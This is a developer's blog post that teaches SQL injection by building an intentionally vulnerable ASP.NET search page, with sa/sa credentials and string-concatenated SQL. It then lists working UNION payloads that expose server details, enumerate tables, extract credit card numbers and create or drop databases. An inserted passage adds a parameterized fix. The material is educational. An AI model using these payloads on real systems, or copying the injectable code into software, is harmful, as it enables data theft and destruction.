Bluedog67

Random Thoughts About SQL Server and My Dog Blue

About Bluedog67

My name is Stephen Horne. I am a well-trained owner of an Australian Cattle Dog named Blue. I also develop software mainly using SQL Server, ASP.NET, and C#. I love data, databases, T-SQL, and turning raw data into actionable information. My plan for this blog is to write about SQL Server and sometimes my dog Blue. Please contact me at stephen at bluedog67 dot com. Follow me on Twitter at bluedog67.

Introduction to SQL Injection Attacks

SQL Injection Attacks. They have been in the news recently with the WSJ and NASA Hacks. What are they? Hackers attack your database through a nice pretty front door that web application developers built and you, the database professional, didn't prevent.

In this post I will show you three things:
  • Creating a SQL Injection-Susceptible Web Site
  • Attacking The Site With SQL Injection
  • Stopping the SQL Injection Attacks

Creating a SQL Injection-Susceptible Web Site

Using Visual Studio 2008, ASP.NET, C#, ADO.NET, SQL Server 2008, and the AdventureWorks database, we will create a very simple web application that is susceptible to SQL Injection attacks. SQL Injection attacks are not associated only with Microsoft technologies but affect all web development languages and databases. I will assume either a reasonable level of knowledge with ASP.NET and C# or that you have access to an ASP.NET developer to help you create and deploy the following mini-application.

Following are the basic steps:

  1. Create new C# ASP.NET Application Project.
  2. Drop a TextBox, Button, and GridView onto the Default.aspx page.
  3. Double-click the Button and add the code below to the code-behind file. Update the database connection information as necessary. For testing purposes, use a sysadmin account. Make sure the server is not a production box! <grin>
  4. Add "using System.Data;" and "using System.Data.SqlClient;" to the header of the Default.aspx.cs code-behind file.
  5. Deploy.

protected void Button1_Click(object sender, EventArgs e)
{
  string strConnection = "Data Source=SERVER;Initial Catalog=AdventureWorks;User Id=sa;Password=sa;";
  using (SqlConnection cn = new SqlConnection(strConnection))
  {
    cn.Open();

    using (SqlCommand cmd = new SqlCommand())
    {
      cmd.Connection = cn;
      cmd.CommandType = CommandType.Text;
      cmd.CommandText = "SELECT ProductID, ProductNumber, Name, ListPrice FROM Production.Product WHERE Name LIKE '%" + this.TextBox1.Text + "%'";

      using (SqlDataReader dr = cmd.ExecuteReader())
      {
        this.GridView1.DataSource = dr;
        this.GridView1.DataBind();
      }
    }
  }
}

The application is very basic. If you click the button you will see a full listing of the AdventureWorks.Production.Product table. If you enter some text, for example Cap, and click the button you will see a filtered list. Congratulations! You have created a SQL Injection-Susceptible Web Site! And depending upon the rights of the user in the application's connection string, you could be in for some serious, serious trouble!
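For contrast, here is the same button handler written the way it should have been. This is an added example, not code from the original post: the user's text is passed as a typed parameter instead of being glued into the SQL string, and the connection uses a least-privilege login (the login name ProductReader and its password are placeholders, not part of the post or of AdventureWorks). The EscapeLikeWildcards helper is also an assumption of this example; it exists only so that a search for "100%" matches that literal text.

```csharp
using System;
using System.Data;
using System.Data.SqlClient;

// Added example: the search handler from above, hardened with a parameterized query.
// Assumes the same page controls (TextBox1, GridView1) and the AdventureWorks schema used in the post.
protected void Button1_Click(object sender, EventArgs e)
{
    // Assumption: ProductReader is a hypothetical login granted only SELECT on Production.Product,
    // so even a successful injection elsewhere in the app could not read Sales.CreditCard or create databases.
    string strConnection = "Data Source=SERVER;Initial Catalog=AdventureWorks;User Id=ProductReader;Password=<placeholder>;";

    using (SqlConnection cn = new SqlConnection(strConnection))
    using (SqlCommand cmd = cn.CreateCommand())
    {
        cmd.CommandType = CommandType.Text;

        // The statement is fixed at compile time. @pattern is sent to SQL Server as a value,
        // never parsed as SQL, so a quote or semicolon in TextBox1 cannot change the query.
        cmd.CommandText = "SELECT ProductID, ProductNumber, Name, ListPrice FROM Production.Product WHERE Name LIKE @pattern";
        cmd.Parameters.Add("@pattern", SqlDbType.NVarChar).Value =
            "%" + EscapeLikeWildcards(this.TextBox1.Text) + "%";

        cn.Open();
        using (SqlDataReader dr = cmd.ExecuteReader())
        {
            this.GridView1.DataSource = dr;
            this.GridView1.DataBind();
        }
    }
}

// LIKE wildcards are not an injection problem, but they do let a user widen the search
// beyond what was typed. Bracketing the SQL Server wildcard characters keeps them literal.
// The "[" replacement must run first so the brackets added by the later replacements survive.
static string EscapeLikeWildcards(string input)
{
    return input.Replace("[", "[[]").Replace("%", "[%]").Replace("_", "[_]");
}
```

With this handler the payloads shown in the next section are just odd search strings: the whole text, quote and all, is compared against the Name column and returns no rows. Parameterizing fixes the injection; the restricted login limits the damage if some other query in the application is ever missed.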

Attacking the Site With SQL Injection

Now is where the fun comes in! Let's do some hacking!

Following is a script that a hacker would place into your application's TextBox that starts to open the SQL Injection door. It isn't very hard to figure this out. Trust me.

XYZ' UNION SELECT 1, 'TEST', 'TEST', 1.23; SELECT '

Interesting.

XYZ' UNION SELECT 1, @@VERSION, 'TEST', 1.23; SELECT '

What the hell!?!

XYZ' UNION SELECT 1, name, 'TEST', 1.23 FROM master.sys.databases; SELECT '

Good grief!

XYZ' UNION SELECT 1, TABLE_CATALOG + '.' + TABLE_SCHEMA, TABLE_NAME, 1.23 FROM INFORMATION_SCHEMA.TABLES; SELECT '

...

XYZ' UNION SELECT 1, CardNumber, 'Test', 1.23 FROM Sales.CreditCard; SELECT '

Uh. Not good.

XYZ' UNION SELECT 1, TABLE_CATALOG + '.' + TABLE_SCHEMA, TABLE_NAME, 1.23 FROM INFORMATION_SCHEMA.TABLES; CREATE DATABASE Test; SELECT '
then run
XYZ' UNION SELECT 1, name, 'TEST', 1.23 FROM master.sys.databases; SELECT '

!!!

XYZ' UNION SELECT 1, TABLE_CATALOG + '.' + TABLE_SCHEMA, TABLE_NAME, 1.23 FROM INFORMATION_SCHEMA.TABLES; DROP DATABASE Test; SELECT '
then run
XYZ' UNION SELECT 1, name, 'TEST', 1.23 FROM master.sys.databases; SELECT '

Pull the plug! Now!

As you can see, things can go from bad to worse with SQL Injection fairly quickly. Depending largely upon the rights of the connection's login and the skills of the hacker, you could have a very serious problem not only with your database and database servers but with your entire network and all your servers. And this is just scratching the surface!

Stopping the SQL Injection Attacks

I am going to hold off on this until the next post. In the meantime: SQL Injection Attacks. Be Afraid. Be Very Afraid!

Categories: SQL Server